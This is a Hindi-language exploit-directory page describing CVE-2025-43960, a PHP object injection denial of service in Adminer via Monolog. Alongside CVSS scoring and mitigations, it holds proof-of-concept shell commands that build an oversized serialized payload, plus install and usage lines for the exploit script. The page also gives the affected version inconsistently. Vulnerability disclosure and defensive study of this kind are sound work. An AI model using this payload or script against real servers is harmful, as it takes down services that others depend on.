Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/far00t01/cve-2025-43960
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubfar00t01/cve-2025-43960

CVE-2025-43960

Adminer <4.8.1 के लिए Monolog के माध्यम से PHP ऑब्जेक्ट इंजेक्शन शोषण, क्राफ्टेड सीरियलाइज़्ड पेलोड के माध्यम से सेवा से इनकार का कारण बनता है। PoC, CVSS स्कोरिंग और शमन मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
131 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-43960 - Adminer < 4.8.1 में Monolog के माध्यम से PHP Object Injection - Denial of Service (DoS)

MITRE से प्रतिक्रिया की प्रतीक्षा करने के महीनों के बाद, मैंने Adminer सेवा (<4.8.1) के विरुद्ध PHP Object Injection हमले के साथ CVE-2025-43960 प्राप्त किया, जो मेमोरी मैनिपुलेशन के माध्यम से Denial of Service (DoS) का कारण बनता है।

https://github.com/user-attachments/assets/ebf7d8e8-01db-4d02-bb12-33321c749458

सारांश

यह कमजोरी दूरस्थ, अप्रमाणित हमलावरों को Monolog का उपयोग करके Adminer 4.8.1 इंस्टेंस का शोषण करने की अनुमति देती है, जिससे PHP Object Injection के माध्यम से Denial of Service (DoS) होता है। हमले के वेक्टर के लिए किसी प्रमाणीकरण या उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं है, जो इसे एक उच्च-गंभीरता वाला मुद्दा (CVSS 7.5) बनाता है जिसमें कुछ साझा वातावरणों में 8.6 तक बढ़ने की संभावना है।

सुझाया गया विवरण

Adminer 4.8.1, जब लॉगिंग के लिए Monolog का उपयोग करता है, एक s:1000000000 स्ट्रिंग जैसे क्राफ्टेड सीरियलाइज़्ड पेलोड के माध्यम से एक denial of service (मेमोरी खपत) की अनुमति देता है, जिसे PHP Object Injection समस्या भी कहा जाता है। यह कमजोरी Adminer इंस्टेंस को प्रभावित करती है जो लॉगिंग के लिए Monolog का उपयोग करते हैं, जहाँ अविश्वसनीय उपयोगकर्ता इनपुट बिना उचित सत्यापन के deserialize किया जाता है। एक बड़े deserialized ऑब्जेक्ट को भेजकर, एक हमलावर उच्च मेमोरी खपत को बाध्य कर सकता है, जिससे Adminer इंटरफ़ेस अनुत्तरदायी हो जाता है और सर्वर-व्यापी DoS होता है।

  • जबकि सर्वर कुछ मिनटों के बाद ठीक हो सकता है, कई समवर्ती अनुरोध पूर्ण क्रैश का कारण बन सकते हैं, जिससे सेवा बहाल करने के लिए मैन्युअल हस्तक्षेप की आवश्यकता होती है।

CVSS स्कोर v3.1

आधार स्कोर: 7.5 (उच्च)
वेक्टर: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

विशिष्ट परिनियोजन पर नोट:

यदि Adminer को क्रैश करने से अन्य सेवाओं/किराएदारों (जैसे, कंटेनर या साझा प्रक्रिया) में भी व्यवधान होता है, तो Scope: Changed लागू हो सकता है:

  • वेक्टर: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • स्कोर: 8.6 (उच्च)

अतिरिक्त जानकारी

संभावित शमन उपाय

  • Adminer और Monolog में अविश्वसनीय डेटा पर unserialize() का उपयोग करने से बचें।
  • अत्यधिक संसाधन खपत को रोकने के लिए PHP में मेमोरी सीमाएँ (memory_limit) लागू करें।
  • अनधिकृत वर्गों के deserialization को प्रतिबंधित करने के लिए unserialize() में allowed_classes का उपयोग करें।

उत्पाद का विक्रेता

  • Adminer

प्रभावित उत्पाद कोड बेस

  • Adminer < 4.8.1 (परीक्षण के समय नवीनतम स्थिर संस्करण)

प्रभावित घटक

  • Adminer में Monolog एकीकरण

समस्याग्रस्त सुविधा

  • unserialize() के माध्यम से PHP Object Injection

संभावित प्रभावित क्षेत्र

  • कोई भी Adminer इंस्टेंस जहाँ Monolog-आधारित लॉगिंग का उपयोग किया जाता है

प्रूफ ऑफ कॉन्सेप्ट (PoC)

पेलोड निर्माण:

root@kitploit:~
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
root@kitploit:~
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt

प्रभाव:

  • सर्वर लोडिंग स्थिति में प्रवेश करता है, जिससे Adminer अप्राप्य हो जाता है।
  • कनेक्शन सक्रिय रहने पर फ्रंटएंड पूरी तरह से गायब हो जाता है।
  • जब हमला बंद हो जाता है, तो सर्वर कुछ मिनटों के बाद ठीक हो जाता है, जब तक कि कई मशीनों का उपयोग न किया जाए (DDoS परिदृश्य)।

स्थापना आवश्यकताएँ

  • Python: सुनिश्चित करें कि आपके पास Python 3.x स्थापित है। आप अपने टर्मिनल में python3 --version चलाकर इसकी जाँच कर सकते हैं।

Python निर्भरताएँ

  • Flask: पेलोड प्रदान करने वाले स्थानीय HTTP सर्वर को चलाने के लिए उपयोग किया जाता है।
  • requests: शोषण प्रक्रिया के दौरान लक्ष्य एप्लिकेशन से संवाद करने के लिए उपयोग किया जाता है।

स्थापित करें

root@kitploit:~
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960
pip install -r requirement.txt
python3 cve-2025-43960.py

शोषण का उपयोग:

root@kitploit:~
python3 cve-2025-43960.py

Usage: cve-2025-43960.py <ip-listener> <port-listener> <ip-victim:port>
Example: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000

संदर्भ

  • https://www.adminer.org
  • https://github.com/vrana/adminer
  • https://github.com/Seldaek/monolog
  • https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
  • https://cwe.mitre.org/data/definitions/502.html
  • https://cwe.mitre.org/data/definitions/400.html
  • https://cwe.mitre.org/data/definitions/789.html

खोजकर्ता

Fabian Rosales (@far00t01) Medium

टूल डाउनलोड करें